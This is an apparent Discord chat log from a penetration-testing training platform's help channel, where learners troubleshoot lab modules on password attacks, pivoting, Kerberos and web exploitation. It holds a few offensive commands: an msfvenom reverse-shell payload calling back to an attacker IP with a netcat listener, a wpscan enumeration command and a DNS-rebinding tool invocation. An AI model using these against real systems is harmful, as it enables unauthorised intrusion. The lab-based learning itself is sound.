#modules

Guys can anyone check if the IDOR Machines from Web Attacks module have some problems connectionwise. It takes too long to open each page

I cannot perform my task at the moment

@rustic sage dont share discovered passwords

Sorry mate
his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?

It helps if you include the module and section name

Password Attacks
Credential Hunting in Network Shares

I treid all of password i found none of them worked

The correct password is in that .txt file, I...###

thanks bro !

If using the pw in the command line, use single quotes to wrap the pw

executed everything correctly but still have not been able to retrieve the flag.txt. I examine the commands as well since sudo is not a part of it but the file is own by root

Helps to know the module and section

Password Attack- Webservices

Also make sure that you are in a directory you can write to (most common mistake)

Web services? Do you mean "network services"?

Can you link it?

Sorry my apologies -- Login Brute Force - Web services

Ahhhh ok

Very different module

Yes! lol my apologies, I have been using medusa thats why the password attack got stuck in my head

Yeah, then my suggestion is to make sure to move to a directory you can write to

/tmp is always a good option

I was thinking of mentioning that earlier but I could not use it either under /tmp

but ftpuser should be able to get the flag

when you mean re-writing do you mean using chmod o+r?

No

I never mentioned rewriting

exactly my struggle, going to try and reset the pwnbox to see if that works but tried for a couple of days

writing*

It has nothing to do with chmod

Also o+r would be read permissions

The broad assumption im making is that you logged into the ftp service using ftpuser, and not sshuser

sure :)
sudo wpscan -e p --url https://cube-case.htb --disable-tls-checks --no-banner --plugins-detection aggressive -t 100

I logged into the sshuser server first and then from the inside I logged in to the ftp service. Is this not the same of what you are saying?

Are you logging into the ftp service with the user ftpuser and the pw you discovered?

Hi, i tried this but it doesn't work, can u still help me?

can i send here a screenshot?

I was able to get it just fine with a -sUV scan not sure what else to really tell ya to help

look at this

Needs passive detection instead of aggressive

I am logged in under ssh using sshuser; then inside ssh I used ftp ftp://ftpuser<PASS>@localhost

No need for -sS and -sU

Its also possible you tripped the detection

ftpuser:pass@localhost

what do you mean?

You dont need both

Theres a reason my first s was lowercase

is not the same than -sUV?

Its not

oh, whats the difference?

What you did was -sSUV

This is the one correct I wrote the <> intentionally in the chat

so -sUV = ?

-sUV is -sU and -sV

and is not the same if i separate them?

-s[can]U[DP]V[ersion]

You threw in an additional scantype

You added -sS into the mix

and is this a problem?

the default scan

You added another set of scans on top of UDP

And because there is a detection mechanism in place, it could incidentally trip it

so the only types of scans i need are -sU and -sV?

Don't use the user:pass to log in just user@localhost. Then put the pw in

Correct

If the detection trips, it blocks you for 3 minutes

different command, same output. Have i get blocked maybe?

Try:

• reconnecting to the vpn
• resetting the lab
  -# sacrificing your firstborn

Thanks!! I can't believe it was that minor autologin when putting the password instead of manually do it. Why does this happen if you don't mind me asking?

No fuckin clue

Configuring the hosts file must have fixed the entire issue, my bad for using the wrong command :(( i tried many different options with the IP address before to see if it will output the vulnerable plugin and just reused the latest one in my bash history xD

Thanks for the help, much appreciated <3

Btw @devout lily for all the skill labs, theres a status.php page you can visit at http://ip/status.php

So you can check if you were blocked

I'll let u know, i have setted up the connection again

Thank you for the help!

I think I understand now. Thank you!
I have two more questions. Wouldn't it be better to exclude the bad characters from the beginning, like 0x0D, 0x0A, 0x00, or should we still enumerate in case we find new bad characters?
And what are some clear signs that a bad character has messed up a byte array, like you described?

I added the -v option

That's just nmap showing you the hex bytes of the response given

Also deleted bc the flag is in the image

👍

sorry, i didn't know

Gotta look closely at output sometimes (it was right there in HTB{FLAGHERE})

i have seen it it now, really hard to see hahah

i think that i wont use the -v option no more haha

-v is only really useful for debugging

got it

thank you

Iirc nmap has three debugging levels

-v -vv -vvv

Hello guys! I was reviewing and re-doing modules after solid brake and came to the issue with Module: Footprinting / SMB. Nmap scans from my own machine gives the wrong version of the samba, without exact subversion. Root cause of that - some changes that've been made inside kali nmap. Netcat also don't provide the right banner with nc -nv ip port.

What do you think , can it make problems inside CPTS for example, should i reinstall older nmap ? Subversions often are crucial, and i cant find this exact correct banner from my own kali on this module in any way. Even from the wireshark capture. Although it gives right answer with academy pwnbox nmap scan.

Well since this isnt related to an academy module i suggest linking your htb account and looking for other channels to ask in.

NexusSeven is an active challenge and yo should not post spoilers about the challenge like that...
Delete that message and go to #challenges and ask for a hint there without posting spoilers of active content.

Hey guys, I'm working on Pass The Certificate (module 147, section 1335) and am stuck trying to get flag.txt on Administrator's desktop. I was able to obtain jpinkman's ccache file and evil-winrm into DC01, but having trouble moving laterally to the Administrator. Do I need to use the AD CS NTLM Relay Attack for this? If so, I'm struggling to get gettgtpkinit.py to work on the certificate obtained from the previous steps.

Yes you need to perform the relay attack and it should result in obtaining a different file.

I'd search this channel for clock skew as this gets asked quite often and there are already plenty of suggestions to fixing that error.

Awesome, thanks so much for the help!

If you cannot get it to work still, you can send me a DM. I'm going to delete your post with the command, as that is considered spoiling content above Tier 0.

Will do

Did anyone manage to solve question 1 of this section??? No matter what I try I can't get the correct answer. I am starting to wonder there might be a mistake in the modoule. Also, I can't look at the step by step because I'm not a subscriber.

https://academy.hackthebox.com/module/312/section/3724

I already looked through the posts on #1234357888114364508 but couldn't find anything related to that

Hello! I working on module "SQLMap Essentials", section "Attack Tuning", first question (What's the contents of table flag5? (Case #5)). I got flag in standard format HTB{<string>} but when I submits answer there is an error: Incorrect answer! Can you help me? What am I missing?

I suggest running it again, as sometimes it might miss a character or something from the flag or cut off parts. At least I remember that happening when I did that module.

Hey guys, I need to contact htb support team about payments. Where can I do that?

Would use the cube located at the bottom right of Academy dashboard.

Thank u I have send them an email

Thanks, I try again!

hello just a question about the login brute force module in the custom wordlist
what the hell iam supposed to generate with
like there is no name no hints no nothing

If it continues, you can DM.

Follow the steps outlined in the section, which includes the information they used in the examples.

Use the example information

oh i jumped to the question cus i know how to do it anyway

thats a bit stupid ngl

ty all

In many cases the reading can reveal new or different ways of doing things as well. So I wouldn't always jump straight to the questions

In short though: when in doubt, check the reading first

100%

but like i use my own linux destro which dont have apt on it so sometimes they ask to install softwares i have alternative too but mine wont work as thiers cus you know password custom lists tools are different

apt package manager

iam going to use the pwn box for that now

Is there a mod or any support person that could check this?

also check theres not an extra space in the end 🙂

why is crackmapexec smb used for kerberos bruteforcing? arent those 2 totally different protocols and things

smb is a protocol, kerberos is an authentication method not a protocol

well, it's an authentication method protocol i guess. but they are different things.

kerberos uses tickets to grant access to specific resources, smb is a service that can use a kerberos ticket, or a username and password

do you know if this covered in the intro to ad module?

it seems that i am very lost on this, i might have to take the intro to ad mod

What do you mean?

i was just confused why nxc and cme was using smb in their parameters when trying to do kerberos usename\password cracking

Where is it doing this?

no because its HTB giving me the creds 😄

Yeah I am in the habit of just running creds with netexec regardless, but if it doesn't explicitly say, RDP or SSH it usually means something else. I did that one with linux tools.

good point it does say just authenticate not ssh or rdp so you are right

Running again helped, there were a wrong symbols, and in second try there were a wrong symbols but different. I cheated and assembly the correct answer 😆 I think its because of my bad network connection

Yes exactly-- when approaching a buffer overflow problem, it can save time to exclude some of those characters from the beginning. "Bad" characters aren't universally bad in all scenarios, but those three very often are. There's always the possibility we'll need to enumerate additional characters that happen to be "bad" given the particular app, architecture and delivery method we're working with in a given scenario.

The byte array comparison is a sure-fire way to tell if and why a buffer overflow will fail due to bad characters. If we were to skip this check and accidentally send a bad character, then only part of the payload will be written to memory. This leads to unpredictable program behavior. At best our payload will quietly fail... or we may recieve a more "clear sign" when the application crashes.

It's a good idea to thoroughly enumerate bad characters before firing away at the target. If we crash the real target application, there's no guarantee the OS will restart it. In a lab, this just costs time restarting the box. In a real engagement, we might only have one shot to get it right.

I have a question whether I'm on the right track solving Parameter Logic Bugs - PoC and Patching - Unexpected Input . Appreciate some help

Ah, I see. I understand now, thanks a lot for explaining!

doing the pass-the-certificate section of the password attacks module rn

does anyone know how to fix this?

https://github.com/fortra/impacket/issues/1716

Password Attack module
suggests using kerbrute or netexec smb to find possible usernames and passwords from the ad
which is basically kerberos bruteforcing

Cant get a revershell back to my machine .. i have entered correct ip and using the port to connect back from nc listener. Error shows failed to daemonise connecion timed out (110).

Also the script is getting executed but the connection is not coming back to the listener please help im struck since forever.

Ps this is from htb academy for file upload attacks module

Keyword is OR but that does not mean both are using the same means of authentication to get results.

When using username/password with netexec you are using NTLM.

Hi guys!

I'm having a problem with a module. Can someone help??

yeah just ask here. make sure not to spoil content from modules above tier 0 though.

answer format is: word-word

I tried it not working

DM me

So, this is for Mudule 19 Section 101

Host Discovery

I'm supposed to use the workstation, right?

I'm trying to figure out what command to give to the powershell...

You should only have to review the information in the last example code block that is in the section. Use that information to answer the question.

(using nmap)

@gray yacht Thank you for the help!

Uhh...I got the hash from the DC pfx file...it's empty.......

I don't know why, but it is...

nvm, I just logged in with the NTLM hash

Keep going

I feel like im doing the password attacks module all over again

on the struggle bus with Indirect Prompt Injection 5. Hoping a break to make dinner resolves the issue and new ideas come to mind 🙂

You still have the port in the second screenshot

deleted

The flag I got is wrong too, probably for a different section

Also you can connect using the ftp command

ftp ip port

Don't need to use nc

I sprayed all 26k combinations from the provided credentials, only got that 1 user that didnt work. I used a different protocol to get in and found the user it wanted that way. I just have to find the other flag now

yeah looks like everything I found was for the next session lol

How can I hide the images??

Ok so

The DC01 computer account has the DCSync right. I was able to get the TGT of the DC01 computer account, but when I try to dump the NTDS.dit, it doesn’t work. However, when I tried with the Administrator TGT, it worked

@lime cosmos Please refrain from posting content from modules above tier 0

Thanks @cloud urchin sorry about the confusion

Ok

Any suggestion about the module cracking the PIN ? I'm using the PIN solver script, the burp Intruder and also with ffuf, but I'm always receiving http code 401

Hey can I have some help with the payloads and shells module please?? I download the msfvenom file on my RDP client, I upload it to the website and deploy it. I have my netcat listening running on the correct port on my pawnbox and I go to the subdomain im supposed to go to for the shell and nothing happens. (msfvenom command: msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o managerUpdated.war) (netcat listener: nc -nvlp 9001)

That looks like the wrong LHOST without looking at the module right away. Pwnbox generally doesn't have a 172.x.x.x IP. Is that the subnet of one of the NICs?

ive tried using both the pawnbox LHOST and the host1 ip (from RDP client) and neither of them seem to connect or do anything

in the pwnbox type ip a

use the 10., i think ens192

unless you're trying to make the victim machine connect to the target you spawned, then it'll be different unless you're pivoting

I think im using the right ip for the pawnbox? tun0? 10.10..??

then try that as your lhost

yeah I just did then I reuploaded the file to the website and went back to the subdomain and still nothing

welp best to state the exact section and question you're on

other than that, maybe the wrong target type (jsp) idk

make sure to use the correct host/port for yourt attacker machine or the pivot, whichever one

Shells & Payloads, The live engagement, question 2

to make sure im understanding correctly Id use the msfvenom command on the RDP client and then upload the file I made from that to the website? and in the walkthrough it said to use (ip a | grep "172.16.1.*") and it spit out the ip (inet 172.16.1.5/23 brd 172.16.1.255 scope global ens224) which is what I used for the LHOST and then port 9001 which is the same as the netcat listener

i'm not sure, i don't recall the skill assessment specifically. if you can execute the binary you generated with msfvenom successfully, then it can only be either 1) a network connection/routing issue or 2) incorrect settings with your msfvenom command.

oh okay, well thanks for helping!!

Attacking Common Applications Attacking Drupal
My php rev shell won't work in my nc listener after pressing save in the web page that takes it.

Excuse me.
Sliver subscription
Description

What you get

• Direct access to all modules up to (including) Tier II
• Direct access to the entire Bug Bounty Hunter job role path
• Direct access to the entire Penetration Tester job role path
• Direct access to the entire SOC Analyst job role path
• Direct access to the entire AI Red Teamer job role path
• Direct access to the entire Junior Cybersecurity Analyst
  —-
  So if I subscribe can i finish two or three path , whit-out the cube system

You can complete a full pathway without using any cubes, you earn cubes and you can use them to unlock other modules outside of the pathway

I have free time and no life and i want to compete two or three ,can i

Or just stick to one path by subscription

I think the silver subscription is just one pathway?

Yes thats my question , one path to complete or more than one path

sysreptor is stupid how do i reset my password?

I Literally saved thew password bro letter for letter and now it's invalid??

I thought you'd have access to all the paths you posted. You will only get an exam voucher for HTB CJCA and either HTB CBBH or HTB CPTS or HTB CDSA though

That might be it too I’m not entirely sure

Is the academy more worth it or regular HTB more worth it?

Probably depends on where you're at with knowledge

i like to think academy is the learning platform while the labs are where you practice what you know.

But is the labs worth paying for?

depends on what you want and where you're at

https://tenor.com/view/it-depends-on-the-situation-alex-engvid-depending-on-the-situation-it-depends-on-the-circumstances-gif-27205658

.

@long kestrel Please don't reveal answers

cool thanks

worked when I repeated steps on pwnbox instead of my VM. thats always a fun one

if it's the lab i think it is, i just think the lab doesn't spin up properly all the time. which is a pain

Anyone available to help on Advanced SQL Injections Skills Assessment Q1?

I'm able to query the columns in the current table. Pretty much all the columns that appear in the source code, however, the password column is not giving me anything and I'm not sure on why. Any nudge would be greatly appreciated.

Edit: Found the issue, seems there is a filter. Gotta read and dissect the source code carefully!
Thanks @river grove

yeah I just tried again with the pwnbox to test it and the FTP service didn't spin up again even after waiting a few minutes

Module: Shells and payloads.
Task: The live engagement

Is the initial foothold experiencing network issues "by-design" ?. I'm having troubles to maintain an proper session...
All ideas are welcome 🙂

try changing to tcp vpn, it's not laggy "by design"

hmm, okay I'll try this.. It is weird cause it is even getting disconnected with the pwnbox.. 🙂 - But ill have a look 🙂. But it is what it is eventually. i

if you're doing a/b testing with the pwnbox, disconnect from the vpn on your machine ¯_(ツ)_/¯

I'm having only 1 connection at the time. Was trying firs with the pwnbox and then tried with my own machine but the situation was present on the both. The issue is present between the pwnbox/myhost and initial foothold machine. Both ssh/rdp

his user, search through the additional shares they have access to and identify the password of a domain administrator. What is it?
assword Attacks
Credential Hunting in Network Shares
I treid all of password i found none of them worked

hi, after setting the vHosts for session security modules, i am not able to access the websites. Ping is working for the ip and after setting the /etc/host i am also able to ping the domain names. But curl or request from browser is failing. Tried restarting the lab multiple times and tried changing my VPN locations. no luck

i don't know if its okay to attach screen shots for reference here

Do HTB academy boxes boot always from a prepared image, or do they keep something from previous boots / players? I ask because I have seen different hosts in the "network" tab of explorer in different lab runs ...
Although this may also mean that I just see boxes of other players that are just discoverable?

Yes it is assume that you have completed CPTS pathway

Now You can get 1 month sub and do Tracks that are related to your exam or certification.

This is where it is related

Academy for focused learning and then HTB labs to make those concepts stronger.

Hey guys anyone had issues with exploiting the attacking common applications attacking drupal think the vms are bugged i have done this again and again followed instructions to exploit it the machine ends up freezing 10min in and thats it no exploit cant do anything

Moment start trying to change settings and add content page starts freezing

Been 48hours now of dealing with it im from aus so the vpns bit slow as well but frustrating anyone else had issues?

Yeah vm no good anyone doing dont bother using metasploit just upload php code navigate using curl

I have been stuck on this question in Parameter Fuzzing GET. Using what you learned in this section, run a parameter fuzzing scan on this page. What is the parameter accepted by this webpage? does anyone know how to solve this

Is this on pentest path?

Dm me if you want mate can help

@severe eagle okay thank you

Hello, I'm trying to complete the module "Linux Fundamentals" and I'm trying to conclude this question: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? (section: Find Files and Directories)

I run the following command:
||find / -type f -name "*.conf" -newermt 2020-03-03 -size +25k -size -28k 2>/dev/null||
But it's tellming that it's wrong... I read some writeup to check if I was good and yes, why it's tellming it's an incorrect answer?

Mb I'm just stupid :>.

I need help in choosing a new module, I have already completed 1. Windows Fundamentals 2. Introduction to networking 3. Introduction to active directory.... Where should I go from here? Priv esc OR Windows Attack & Defense?

Is it after the full path or just the filename?

Hello,
I am on Windows Privilege Escalation Module, I am working on Windows Privilege Escalation Skill Assessment Part - 1. I am stuck on question 2 and 3.
I am on Windows Server 2016, I need to find ldapadmin password and tried everything taught in the module, still did not find anything. The SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege is enabled, however, Juicy potato and printspoofer exploit fails.
Any nudge

Why the -sV option is not showing to me the version of that service?

Firewall and IDS/IPS Evasion - Hard Lab

Hi everyone,
In the Pentest in a Nutshell module -> Linux Privilege Escalation section https://academy.hackthebox.com/module/296/section/3398
it says that the user john is able to run /usr/bin/nano without typing a password, but it still requires a password when i try out the procedure myself...

I think the issue is with the ordering in the sudoers file.
https://unix.stackexchange.com/questions/67435/sudo-password-prompted-even-when-nopasswd-is-set

Hey, I’m doing the password attacks module, I’m on the intro to jtr. Is it possible to use the vpn in this part of the module, cause I don’t wanna use the pwnbox but there is no ssh to access the passwd to crack r0lfs password

You never are forced to use the pwnbox. You can always use your own VM. Sometimes there are sections of modules that require you to run commands from the target spawned though (not the pwnbox.)

But how would I get the specific passwd file into a vm

And there is no target spawned in this

copy/paste the hash?

Ohhh, ok, thanks

How are you trying to execute juicy potato? Reread the hint

I've never liked the order of questions in that module. Do question 3 then question 2

Ok

I didn't read the hint in the first place.

Hi i am in the end of AEN did most of it blind but got to a point where the exploit dont work in lateral movement section (ftpservice) if anyone could help i would appreciate

Why not search the solution for your question? I mean, it’s a walkthrough

I tried the solution in the path but didnt work

Even restarted the machine and tried another online solution to the exploit

I can’t remember having issues with it 🤔

Can’t check now though, on my phone

ok i will see what i can do

If SeImpersonatePrivilege is enabled, still having trouble exploiting it. Could you explain why?

Lateral Movement Module -> Skill assessment -> Second question says there is a flag on a desktop, but there is not. Can someone pls check? Seems like a bug to me

Hi, anyone could help me with Windows Attacks & Defense > PKI - ESC1? I did convert to cert.pfx but when running Rubeus it shows this error "KDC_ERR_PADATA_TYPE_NOSUPP".

cpts path?

i also did get the same error but dont know to solve

I am doing the module solo, no path

its tier 3?

It was there when I did it a couple months ago. Make sure you're looking on the right desktop.

^

If I had to take a guess, you're working on the Web one right now

It can be a lot of things but assuming everything with your exploit execution is correct, the biggest issue is generally how and where you are executing from. Hence the hint.

I just noticed, I guess the question is a bit misleading! 😄

This usually means theres an issue with the ADCS. I ran into the same error. My solution was to restart the machine

Also, make sure you set your realms properly in the krb5.conf

Previously, I have exploited it couple of times, and it worked all of the time, don't why it is not working.

Hi

I tried this in both the pwnbox and my Kali VM machine

I mean if I'm understanding this correctly, this should start a local listener on local port 3300 request Meterpreter to forward all the packets received on this port via our Meterpreter session to the remote host 172.16.5.19 and remote port 3389

@snow mirage Please take care not to post contents from modules above tier 0

So where can I go for help on this module that's apart of the CPTS path @cloud urchin ?

here, just don't post content from modules above tier 0

...

That was from the module. bro what? I'm not understanding you. So I can ask for help for the module here....but I can't post of the module here because it's above tier 0?

Or was it because of the screenshots? @cloud urchin

Your screenshot contained contents from the module. It had a username and password. On top of this, anyone who has done the modules doesn't need details from the module because they know what to do already so there is no need to post content from the module.

Your error said failed to connect to the localhost, so it's likely a routing/config issue with your proxychains.

My proxychains has the line socks4 127.0.0.1 9050 since I'm using a version 4a socks proxy

My meterpreter socks proxy server was set with ip of 0.0.0.0 and port of 9050

so my socks proxy server matches my proxychains

but it's still not working

You can state the module and the issue without the screenshot. If it's in the CPTS path I can boot up the lab and take a look

you may also need to wrap the password in single quotes due to special chars

but the error is clear, says can't connect to localhost

maybe go over the section again, looking at my notes i'm not seeing connecting to localhost

should be connecting to the target

Module: **Pivoting, Tunneling, and Port Forwarding
**
Section: Meterpreter Tunneling & Port Forwarding

Yeah I was just trying to follow the instructions in the module.

There's a line about creating a Local TCP relay and then connecting to the target through that localhost

over xfreerdp

yo guys

im having issues with kirbi2john.py

i see, that's further down than i was looking

the output crack_file is empty

Didn't mean to spoil content my b

but this part doesn't look like you use proxychains

so you are doing things the section didn't show, try following exactly what it shows

ive extracted base64 string from mimikatz, removed new lines, and saved it to file.kirbi, then i run python3 kirbi2john.py file.kirbi, and i get a crack_file, but its empty

im on AD assesment 1 btw

I mean using proxychains and setting it up was apart of the earlier portion of the module. That being said when I say I "set it up" It already had that line socks4 127.0.0.1 9050

There was a line right after that to use the socks_proxy module to route all the traffic via our Meterpreter session which seems to copy the proxychains conf I think?

So once that's done, I route all the traffic via my Meterpreter session with autoroute

and then followed the instructions to portforward in the next topic section of that page

So it sounds like you are in-fact supposed to do it. I think the meterpreter session is doing the equivalent of local SSH port forwarding. It's just not working lol

I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242

@mental canopy is it possible I can DM you. if not, totally ok.

Yeah for sure, DM. I just got the targets up so I'm working through it now

try setting a port other than 9050 in proxychains.conf and in metasploit socks_proxy

I'm on Question#5 in the Network Foundations/Internet Architecture quiz, and its asking me In which architecture is the control plane separated from the data plane? (Format: two words, one of which is hyphenated) I've answered "Software-Defined", or software-defined, and it's not accepting any of my answers. Is this the incorrect answer? https://academy.hackthebox.com/module/289/section/3242

Maybe this is not the right channel (GOt redirected here, so just copy pasting my question over here)
Why is the vpn configuration file working perfectly fine but not if i run it as a basic command (exiting due to fatal error)
1 line before: 2025-08-30 20:51:40 ERROR: Cannot ioctl TUNSETIFF tun: Operation not permitted (errno=1)
(t is a Linux-specific ioctl (input/output control) command used by user-space applications to request the creation of a network device that operates at the IP (Layer 3) level, known as a TUN interface. )
Still not quite getting it- so this is like a network device in the network layer (3) that is being "newly" created in order to add a vpn configuration ? (Thats my assumption kinda)

https://labs.sysre.pt/login/local/

for hosted version on the login Page… There’s a password reset

And for Self-hosted:

https://docs.sysreptor.com/users/forgot-password/

when was your last login?

Inactive accounts get deleted after some time.

If not, you just got the wrong password

in DACL Attacks II, the Shadow Credentials section states that if Certificate Trust model is implemented, the client issues a certificate request to obtain a trusted certificate from the environment’s certificate issuing authority for the TPM-generated key pair. On the other hand, if the Key Trust model is implemented, the public key is stored in a new Key Credential object in the msDS-KeyCredentialLink attribute of the account.

But in the exploitation attempt, whisker or pywhisker generate a certificate that is later used to obtain a TGT, even tho whisker obviously shows that it is editing the msDS-KeyCredentialLink attribute which means the Key Trust model is used instead of the Certificate Trust model.

Can anyone clarify this point ?

I don’t get it, can you explain it please?

I’m working on the lab “Windows Event Logs & Finding Evil: Analyzing Evil With Sysmon & Event Logs” using PWNBOX. sysmon.exe -c filename.xml wasn’t working, so I tried troubleshooting by uninstalling Sysmon and then reinstalling it using sysmon.exe -i -accepteula -h md5,sha256,imphash -l -n. Even after this, I still cannot get sysmon.exe -c filename.xml to work. I also changed the directory to C:\Tools\Sysmon, but it keeps giving an error that the directory or file doesn’t exist. I need this to properly attempt the hijack using calc.exe as part of the lab. Could you provide guidance on the correct way to use the configuration file or troubleshoot this issue?

Hi.. am having trouble identifying a network interface for which I can use to capture a handshake.i have tried ip a and iwconfig but there is no wlan interface only 2 interface which is tunn, internet and loopback. Running an instance on htb. How do i solve this?

hey guys, i need help with these two questions in Footprinting Module DNS Section

Yo

@prisma knot Please don't post content from modules above tier 0, ie passwords etc. Try wrapping the password in single quotes.

Idk what Tier 0 is i just need some assistance with a command, didn't post anything thats not in the cheat sheets

Cheat sheet is part of the module.. the modules are tier0-tier4

Thanks for the help

In "Pivoting, Tunneling, and Port Forwarding" module section "RDP and SOCKS Tunneling with SocksOverRDP" when i am extracting the "SocksOverRDP x64 Binaries" on the Windows machine from where i am suppose to pivot the window is deleting the DLL file before ni can even execute the command how to fix this

Disable real time monitoring

I am the alpha skid

That's great, please stay on topic though.

same thing i can do in CPTS exam ?

@cloud urchin

The only restrictions you have on the exam are 1) not getting help from anyone and 2) following the rules of engagement

Okay

Has anyone completed.
Attacking Common Applications Attacking Drupal
If so, please DM me.

This line save my day! Thanks!

@here

Hello, can somebody help me, i am in the modern web exploitation techniques PDF page, so i use DNSRebinder for making my petition, i am using like this ||sudo python3 dnsrebinder.py --domain www.attacker.htb --rebind MyServer --ip 1.1.1.1 --counter 1 --tcp --udp|| cause when i use it like it is suggest in the module i get the internal server error, so the only thing i was able to do is to load an HTML PoC but i thing that scripts arent running. Plz give me some hints

Plz help 🙁

i have masked the flag actually

why is HTB flag ans not getting accepted ? i s there any issue with the lab ?

as mentioned in the hint i have run --no-cast and -T flag5 parameters

Somebody can help me plz?

for one your server isn't going to be 1.1.1.1

No, the 1.1.1.1 is the only way i found to bypass the internal server error

Casting probably modifying the flag. Guess what it could be based on what the flag says, or re-do it

How can I apply to contribute to making content/modules on HTB ?

This isn't really the channel for such discussions, you'll want to follow the instructions in #welcome to gain access to more channels. But here https://www.hackthebox.com/blog/make-vulnerable-machine

The page is resolving my server, but the script isnt running, i got no requests to my server, and the DNS rebinder only got two request to render the PDF but no the request of the script itself

I could be misremembering but I thought you had to use your own DNS server for that

Instead of DNS rebinder?

looking at my notes, your command isn't the same as mine so idk

but you are using like its mention in the module ||sudo python3 dnsrebinder.py --domain www.attacker.htb. --rebind 192.168.178.1 --ip $PUBLIC_WEBSERVER_IP --counter 1 --tcp --udp||?

idk, there are like 5 DNS rebinding sections, i just picked one since you didn't say which

i'd suggest just going over the section again carefully and making sure it's setup properly

Im using the SOP bypass one

cause when i go to the flag page it says "Access Violation: Not localhost"

sounds like it's got some protection you need to get around then

i can't quite remember

i remember it worked though

so like i said go through it again double check make sure everything is correct

Ok thanks for ur help mate

yeah sorry been a long time since i did that module

I got it bro thanks for ur suggestions @cloud urchin

@stable flume Please take care not to post content from modules above tier 0

ohh my bad sorry

another one...
in the Windows System Enumeration section, its impossible to find the last two flags of the skills assessment.

It gives you a cmdlet to run if it fails, did you try that?

the one that redirects it to a file? yes

no, the cmdlet your app says

systeminfo ?

no... the cmdlet shown in your screenshot..

Yeah okay, get-computerinfo works, thanks :)). the section never mentioned it, i even checked the step by steps solution.
Shouldnt the system info get outputted by WinPEAS ?

probably yeah

looks like that user doesn't have perms for the binary though

i didn't do that module so not sure

Should hack the box have an exploit development certification? I mean offsec has several

And wouldn’t it help people who want to learn to code for infosec?

You can tell em you want one through /feedback

Ok

Just told them

i found another command on the internet for the last question.
but for the OS version it doesnt accept any of my answers xD

I think they are adding more python content tho

Since the AI red teamer path assumes python fundamentals skills

So I think they probably do have SOMETHING in mind

Where they integrate coding skills

It says it recommends calculus as prereq for AI path

Do you really need calculus?

But it does say python fundamentals is required

I think maybe I should stop talking about all this stuff because it does look like material that requires programming is slowly being added

As 0xW1LD already said. If you miss something, then write a feedback

Ok I just wrote a bunch of feedback.

I wrote some recommended paths in feedback:

• malware development/exploit development path in c/c++
• python web pentesting path
• wireless pentesting in python path
• writing phishing pages that evade phishing filters path with JS, PHP, SQL, etc

Anyone thought of a path I haven’t?

Not necessary to have all these paths of course but it would be cool

In the event that they don’t add all of these paths, I will try to learn some of this stuff anyways at some point

But I’m not gonna do that until I have completed other learning paths preferably at least one from tier 3

But ya I don’t know I don’t think any of those paths need to be a path but I can see someone benefiting from it

Most of them would be skills paths

Probably

But what do you guys think?

I also think it would be cool to have a path that does stuff with BASH or PowerShell as a specialty like for privesc

Any of these things resonate with you guys?

Any of these would be cool imo

Not necessary because you can just learn frameworks and build stuff

https://roadmap.hackthebox.com/htb-academy

Maybe post all your stuff here too @quasi wave

This might just get lost , unless you provide /feedback

But would definitely be fun. Since I don’t want to depend on a learning path becoming a thing, I looked at python frameworks that could complement CWEE material, it gave ok results.

I did a bunch of /feedback stuff

If I remember correctly, malware development was once addressed in a cube cast.

The Python Web Pentesting exists and is called CWEE

There are several wireless pentesting modules. Do you want to write existing frameworks in Python? Or what is the goal here?

Bypassing phishing filters doesn't have much in common with ethical hacking.

Okay 🙂

For each of the things I mentioned I made feedback

I didn’t realize CWEE covers writing your own tools in python

Great. So I am psyched that’s w thing.

Bypassing phishing filters would be an educational thing. Could be good for red teaming or learning how to defend against it better.

The Privilege Escalation path covers bash and powershell tools and writing simple privilege escalation scripts

Also, which cube cast?

Ok point taken

Can I listen to an old cube cast?

I would like to listen

Tools is perhaps a bit over the top, but you write various exploits.

Ok that’s fine it will get you started then

#📣-announcements message

For wireless, I’m thinking there could be a path to write like IoT attacks in Python or write python scripts to complement wifi or other wireless hacking tools

Like to complement existing tools

Why don't you want to use existing tools?
Python is great for automating things, but it's not really suitable for replacing existing tools.

Ok got it

Never mind that then

What about python for enterprise network attacks to complement pro labs?

Maybe I’m overthinking it

You wouldn't really use python for attacking enterprise networks, you're more likely to need a compiled Windows compatible language like C

Ok

Check out Attacking Enterprise Network module

Ya well in that case maybe I’m overthinking it

Ya that’s a module at the end of CPTS

Well ok

Well maybe I am being dumb but I looked at announcements page and I can’t find the exact cube talk even when searching for exploit development.

Was this a recent cube talk?

Or was it a long time ago?

But you can find all Cube Talks here. I don't know in which one this was mentioned. It could have been a while ago.

Regarding malware/exploit development in C/C++... you might be interested in some of the Tier IV Defensive modules. While the exercises and assessments are defense-oriented, the section content is fairly purple. These modules assume a basic understanding of C/C++, pointers and structures, and there are some tricky programming challenges.

Intro to Windows Evasion features some exploit development in C# as well. More of these would be great.

yo guys im on AD assesment 1

idk this might be a spoiler

anybody i can DM for help ?

how did you identify where the problem was?

could i get a nudget for NoSQL injection sa2?, pretty sure i know what to do just need a slight nudge on whether what im doing makes sense

you can DM me

@wanton heath No. This server is for discussion of HTB, not illegal stuff.

Sorry I didn't know it was illegal I'm new to this 😁😁

I am having the exact same issue - hashcat does not work on the provided vm- i have the hashes but they do not crack with rockyou

If hashcat iterated through rockyou successfully it sounds like hashcat is working

Introduction to Networking and Network Foundations modules. Which one should i start first?

I second this

Hello, would appreciate some help. Crafted a golden ticket, converted to .ccache and exported, but I get this error: [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) when trying to connect with my newly created user GOD

I found this picture in "Network fundamentals":

IP address started with "503.x.x.x"?? Really? Who is the author of this study, I wonder?

You can post such failures in #1234357888114364508

already solved it.. i was using an instance instead of RDP

Attacking Common Applications Splunk - Discovery & Enumeration
I cannot access any of the splunkd ports attached to the target port using either curl or the browser. How do you resolve this issue?

anybody can help me?

@hasty mauve @brave field
Really late reply but I might have an answer (maybe you already knew but just in case).

I ran into the same sharp/bloodhound issues. Running the pre-installed sharphound.exe and bloodhound legacy on the remote workstation was the only method that led to 13 kerberoastable accounts.

Then I noticed that the krbtgt account was visible in the 13 accounts and not in the 12 accounts. Bloodhound legacy uses a different query which leads to 13 instead of 12:

MATCH (n:User)WHERE n.hasspn=true
RETURN n

vs bloodhound ce query

MATCH (u:User)
